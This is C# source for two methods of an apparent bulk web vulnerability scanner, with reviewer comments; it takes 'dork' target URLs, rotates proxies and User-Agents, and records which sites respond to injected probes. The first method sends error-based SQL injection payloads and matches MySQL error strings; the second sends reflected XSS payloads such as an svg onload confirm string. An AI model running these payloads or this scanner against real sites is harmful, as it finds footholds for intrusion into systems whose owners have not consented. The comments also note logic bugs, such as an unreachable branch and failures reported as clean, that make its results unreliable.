/// <summary>
/// Checks one URL for error-based SQL injection. Each probe string in <c>sqlpayloads</c> is handed to
/// <c>helperObejct.insertPayload</c>, every URL it returns is requested, and the lowercased response
/// is searched for MySQL/PHP database error text.
/// </summary>
/// <remarks>
/// The signatures only appear when an application returns raw database errors to the client.
/// Parameterized queries remove the flaw itself; generic error pages merely hide this signal.
/// Requests carry a random User-Agent from <c>Leaf.xNet.Http.RandomUserAgent()</c>.
/// </remarks>
/// <param name="dork">Target URL. Passed by reference: on a hit it is overwritten with a
/// "url=… | WAF=… | payload=…" summary string.</param>
/// <param name="objectString">Not used in this body.</param>
/// <param name="proxy">Forwarded to <c>helperObejct.setProxy</c> when <c>NeedProxy</c> is set.</param>
/// <param name="additionalOne">Not used in this body.</param>
/// <param name="additionalTwo">Not used in this body.</param>
/// <returns><c>bruteResult.sql</c> when an error signature is found in a probed response;
/// otherwise <c>bruteResult.unvulnerAble</c>, which is also returned when any exception is thrown.</returns>
public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null) {
    // NOTE(review): transActions is incremented here and decremented on every exit path with plain ++/--.
    // If this method runs on several worker threads (the Dispatcher.Invoke below suggests it is called
    // off the UI thread; confirm), the counter can drift; Interlocked.Increment/Decrement would be needed.
    transActions++;
    try {
        // Probe strings handed to insertPayload, one at a time.
        List <string> sqlpayloads = new List <string>() {
            "'",
            ".(('\".,,,,",
            "AND 7786=7473-- FNiT",
            "\"(().()('.",
            "'YgxvMp<'\">AqklPj",
            "') AND 7648=7021 AND ('vhCh'='vhCh",
            " AND (SELECT 5232 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(5232=5232,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FeKK",
            " AND 2229 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2229=2229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(113)))"
        };
        string userAgent = Leaf.xNet.Http.RandomUserAgent();
        // waf is only recorded in the result row and summary string; it does not alter the checks below.
        bool waf = false;
        if (wafProtection(dork)) { waf = true; }
        // One request object is shared by every request in this call. Timeouts are helperObejct.timeOut * 1000
        // (presumably seconds converted to milliseconds; confirm).
        // NOTE(review): req is never disposed in this body; confirm whether HttpRequest needs a using block.
        Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest() {
            IgnoreProtocolErrors = true,
            AllowAutoRedirect = false,
            Cookies = new CookieStorage(false),
            ConnectTimeout = helperObejct.timeOut * 1000,
            ReadWriteTimeout = helperObejct.timeOut * 1000,
            KeepAlive = false,
            UserAgent = userAgent
        };
        // Body of the unmodified URL, fetched lazily on the first probed URL and reused as the baseline.
        string baseSource = "";
        foreach (string item in sqlpayloads) {
            if (NeedProxy) { helperObejct.setProxy(ref req, proxy); }
            // Presumably returns the URL variants with the probe inserted, or the sentinel below; verify against the helper.
            List <string> urls = helperObejct.insertPayload(dork, item);
            foreach (string urlChecking in urls) {
                // Sentinel from insertPayload: stop and report not vulnerable.
                if (urlChecking == "itsnotInjectAble") { transActions--; return(bruteResult.unvulnerAble); }
                else {
                    if (baseSource.Length <= 0) { baseSource = req.Get(dork).ToString(); }
                    req.Get(urlChecking);
                    string source = req.Response.ToString().ToLower();
                    // NOTE(review): this list is loop-invariant but rebuilt for every URL. After lowercasing,
                    // "error in your sql syntax" and "error in your SQL syntax" are the same entry.
                    List <string> targetBugs = new List <string>() {
                        "warning: mysql_connect()",
                        "warning: mysql_fetch_row()",
                        "error in your sql syntax",
                        "warning: mysql_result()",
                        "mysql_num_rows()",
                        "mysql_fetch_assoc()",
                        "mysql_fetch_row()",
                        "mysql_numrows()",
                        "mysql_fetch_object()",
                        "MySQL Driver",
                        "MySQL ODBC",
                        "MySQL Error",
                        "error in your SQL syntax"
                    };
                    foreach (string ite in targetBugs) {
                        // NOTE(review): source is lowercased and compared with ite.ToLower(), but baseSource is
                        // compared in its original case against the un-lowercased signature. The baseline
                        // exclusion is therefore case-sensitive while the detection is not, so results are unreliable.
                        if (source.Contains(ite.ToLower()) && baseSource.Contains(ite) == false) {
                            transActions--;
                            try {
                                // A ref parameter cannot be captured by a lambda, hence the local copy.
                                string url = dork;
                                // Adds a result row and refreshes the view through the main form's dispatcher.
                                helperObejct.mainFormObject.Dispatcher.Invoke(() => {
                                    itsABug bug = new itsABug() {
                                        id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                        url = url,
                                        vulnerability = "sql",
                                        WAF = waf.ToString(),
                                        payload = item
                                    };
                                    helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                    helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                    helperObejct.mainFormObject.resultView.Items.Refresh();
                                });
                                // Overwrites the caller's string with a summary of the finding.
                                dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                            } catch { } // NOTE(review): UI/update failures are swallowed; the hit is still returned.
                            return(bruteResult.sql);
                        }
                    }
                }
            }
        }
        transActions--;
        return(bruteResult.unvulnerAble);
    } catch {
        // NOTE(review): every exception (timeout, DNS failure, proxy error, …) is reported as "not vulnerable",
        // so a failed request is indistinguishable from a clean result.
        transActions--;
        return(bruteResult.unvulnerAble);
    }
}
/// <summary>
/// Checks one URL for reflected XSS. Each probe in <c>xsspayloads</c> is handed to
/// <c>helperObejct.insertPayload</c>, every URL it returns is requested, and the response body is
/// searched for the probe marker reflected with its <c>&lt;</c>, <c>'</c> and <c>"</c> characters intact.
/// </summary>
/// <remarks>
/// A match requires the marker to come back unencoded, so context-appropriate output encoding of
/// reflected input leaves this check nothing to match. Three of the four probes carry the constant
/// marker <c>PH09NIXPY74X</c>, which is therefore visible in request logs; the User-Agent is random.
/// </remarks>
/// <param name="dork">Target URL. Passed by reference: on a hit it is overwritten with a
/// "url=… | WAF=… | payload=…" summary string.</param>
/// <param name="objectString">Not used in this body.</param>
/// <param name="proxy">Not used in this body.</param>
/// <param name="additionalOne">Not used in this body.</param>
/// <param name="additionalTwo">Not used in this body.</param>
/// <returns><c>bruteResult.xss</c> when the marker pattern matches a probed response but not the
/// baseline; otherwise <c>bruteResult.unvulnerAble</c>, which is also returned when any exception is thrown.</returns>
public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null) {
    // NOTE(review): plain ++/-- on transActions; if this runs on several worker threads (confirm),
    // the counter can drift and Interlocked.Increment/Decrement would be needed.
    transActions++;
    try {
        // waf is only recorded in the result row and summary string; it does not alter the checks below.
        bool waf = false;
        if (wafProtection(dork)) { waf = true; }
        // Two values from randomText(3) (presumably 3-character random strings; verify) bracket the marker.
        string first = randomText(3);
        string sec = randomText(3);
        // Probe sent to the target: a leading quote followed by first<'">sec.
        string finalpayloadTest = "'" + first + "<'\">" + sec + "";
        // Expected reflection without the leading quote: first<'">sec.
        string finalpayloadCheck = "" + first + "<'\">" + sec + "";
        // Verbatim string: evaluates to first<\'\">sec, the marker with a backslash before each quote.
        string finalpayloadCheck2 = $@"{first}<\'\"">{sec}";
        List <string> xsspayloads = new List <string>() {
            finalpayloadTest,
            "%27%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
            "%22%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
            "PH09NIXPY74X%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
        };
        List <string> containsList = new List <string>() { finalpayloadCheck2, finalpayloadCheck };
        string userAgent = Leaf.xNet.Http.RandomUserAgent();
        // Body of the unmodified URL, fetched lazily on the first probed URL and reused as the baseline.
        string sourceBase = "";
        foreach (string item in xsspayloads) {
            // Presumably returns the URL variants with the probe inserted, or the sentinel below; verify against the helper.
            List <string> urls = helperObejct.insertPayload(dork, item);
            foreach (string urlNew in urls) {
                // Sentinel from insertPayload: stop and report not vulnerable.
                if (urlNew == "itsnotInjectAble") { transActions--; return(bruteResult.unvulnerAble); }
                else {
                    // A fresh request object per URL. Timeouts are helperObejct.timeOut * 1000
                    // (presumably seconds converted to milliseconds; confirm).
                    // NOTE(review): req is never disposed in this body; confirm whether HttpRequest needs a using block.
                    Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest() {
                        IgnoreProtocolErrors = true,
                        AllowAutoRedirect = true,
                        Cookies = new CookieStorage(false),
                        ConnectTimeout = helperObejct.timeOut * 1000,
                        ReadWriteTimeout = helperObejct.timeOut * 1000,
                        KeepAlive = false,
                        UserAgent = userAgent
                    };
                    if (sourceBase.Length <= 0) { sourceBase = req.Get(dork).ToString(); }
                    string source = req.Get(urlNew).ToString();
                    // NOTE(review): the pattern is built by concatenation without Regex.Escape. In .NET regex
                    // syntax a backslash before a quote escapes that quote, so the finalpayloadCheck2
                    // alternative matches the same text as finalpayloadCheck, not the backslashed form.
                    // The Regex is also loop-invariant but rebuilt for every URL.
                    Regex rx = new Regex("PH09NIXPY74X<svg|" + finalpayloadCheck + "|" + finalpayloadCheck2);
                    // Hit: the pattern appears in the probed response and not in the baseline.
                    if (rx.IsMatch(source) && rx.IsMatch(sourceBase) == false) {
                        transActions--;
                        try {
                            // A ref parameter cannot be captured by a lambda, hence the local copy.
                            string url = dork;
                            // Adds a result row and refreshes the view through the main form's dispatcher.
                            helperObejct.mainFormObject.Dispatcher.Invoke(() => {
                                itsABug bug = new itsABug() {
                                    id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                    url = url,
                                    vulnerability = "xss",
                                    WAF = waf.ToString(),
                                    payload = item
                                };
                                helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                helperObejct.mainFormObject.resultView.Items.Refresh();
                            });
                            // Overwrites the caller's string with a summary of the finding.
                            dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                        } catch { } // NOTE(review): UI/update failures are swallowed; the hit is still returned.
                        return(bruteResult.xss);
                    } else {
                        foreach (var STR in containsList) {
                            // NOTE(review): this condition tests source.Contains(STR) against its own negation,
                            // so it is always false and the block below is unreachable. It duplicates the
                            // reporting code above; the second operand looks like a copy/paste slip (confirm intent).
                            if (source.Contains(STR) && source.Contains(STR) == false) {
                                transActions--;
                                try {
                                    string url = dork;
                                    helperObejct.mainFormObject.Dispatcher.Invoke(() => {
                                        itsABug bug = new itsABug() {
                                            id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                            url = url,
                                            vulnerability = "xss",
                                            WAF = waf.ToString(),
                                            payload = item
                                        };
                                        helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                        helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                        helperObejct.mainFormObject.resultView.Items.Refresh();
                                    });
                                    dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                } catch { }
                                return(bruteResult.xss);
                            }
                        }
                    }
                }
            }
        }
        transActions--;
        return(bruteResult.unvulnerAble);
    } catch {
        // NOTE(review): every exception (timeout, DNS failure, …) is reported as "not vulnerable",
        // so a failed request is indistinguishable from a clean result.
        transActions--;
        return(bruteResult.unvulnerAble);
    }
}